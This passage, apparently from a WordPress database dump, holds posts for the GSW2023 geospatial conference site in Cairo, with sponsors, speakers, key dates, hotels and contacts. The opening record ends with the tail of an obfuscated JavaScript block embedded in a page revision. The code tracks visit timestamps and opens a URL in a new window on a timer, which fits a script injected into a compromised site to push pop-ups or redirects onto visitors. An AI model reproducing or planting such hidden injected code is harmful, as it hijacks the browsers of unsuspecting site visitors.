Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:30:14','2023-06-09 14:30:14','',3066,'https://gsw2023.com/?p=4653',0,'revision','',0),
(4654,1,'2023-06-09 17:12:56','2023-06-09 17:12:56','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 